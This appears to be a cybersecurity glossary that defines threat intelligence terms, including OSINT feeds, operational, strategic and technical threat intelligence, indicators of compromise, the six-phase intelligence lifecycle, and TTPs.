Threat Intelligence Glossary

Actionable threat intelligence is evidence-based knowledge used to make informed decisions about responding to specific threats. It includes contexts, mechanisms, indicators, implications, and action-oriented advice about threats.

Putting raw data through various distillation and personalization processes turns it into actionable threat intelligence, letting security teams mitigate relevant risks and disrupt attacks.

Open source threat intelligence (OSINT) feeds refer to threat intelligence data sources that anyone can access online or offline. They are provided by organizations and individuals alike.

Online OSINT feeds are, of course, hosted on publicly accessible websites. While some may require registration, most do not. Signing up to OSINT feeds gives the additional benefit of getting email notifications each time a new feed gets uploaded. Subscribers can obtain offline OSINT feeds in the form of printed newsletters, security conference and training handouts, or threat reports. In this definition, we’ll focus on Internet-accessible OSINT feeds.

You can compare OSINT feeds to the news or social media feeds or newsletters you get via email daily.

Operational threat intelligence refers to data on specific incoming attacks that are said to be actionable. It describes the attack’s nature, identifies who is responsible for it, and indicates when it will affect an organization.

Executives use this information to design strategy-based plans and policies to protect their organizations against attacks that may affect them. Other users include business unit managers and security operations personnel.

Strategic threat intelligence refers to that which gives users a high-level view of their organization’s cybersecurity posture, threats and their effects, and attack trends concerning their business. Senior executives like chief information security officers (CISOs) often use it.

Strategic threat intelligence helps executives handle existing cyber risks and predict and mitigate currently unknown risks.

Technical threat intelligence, also known as “cyber threat intelligence,” refers to threat indicators of compromise (IoCs) that cybersecurity staff use to protect their networks. It includes control-and-command (C&C) channels, tools (malware and exploits), IP addresses, domains, malicious emails, and others that threat actors use to breach a target system or network.

Compared with strategic and tactical threat intelligence, this data is meant for short-term use. But unlike operational threat intelligence, which is also for short-term use, technical threat intelligence is specific.

Threat intelligence feeds are continuous data streams relevant to an organization’s security. They enable companies to stay on top of potential and existing threats by providing information about cyber attacks, suspicious activities, and global cybercrime trends. This data is gathered through artificial intelligence (AI).

Threat intelligence feeds inform organizations about indicators of compromise (IoCs), which are digital hints that a device or system has been compromised. They also help identify threat actor tactics, techniques, and procedures (TTPs), which encompass the cybercriminals’ strategies and processes in carrying out an attack.

The threat intelligence lifecycle is a framework that outlines and implements security measures more efficiently and effectively. It continuously produces intelligence from raw data, allowing organizations to build defensive mechanisms against emerging risks and threats.

In sum, the threat intelligence lifecycle helps and guides intelligence teams in building an efficient threat intelligence platform. It comprises six phases—direction, collection, processing, analysis, dissemination, and feedback.

TTP, short for “tactics, techniques, and procedures,” is a pattern found among the activities or methods that a particular group of threat actors uses in a specific attack. Analyzing TTPs helps in counterintelligence and security operations in that it describes how threat actors perform attacks.

Think of TTPs as the modus operandi of a particular criminal gang. The TTPs, in such a case, translate to the way they carry out all of their crimes—their trademark, so to speak.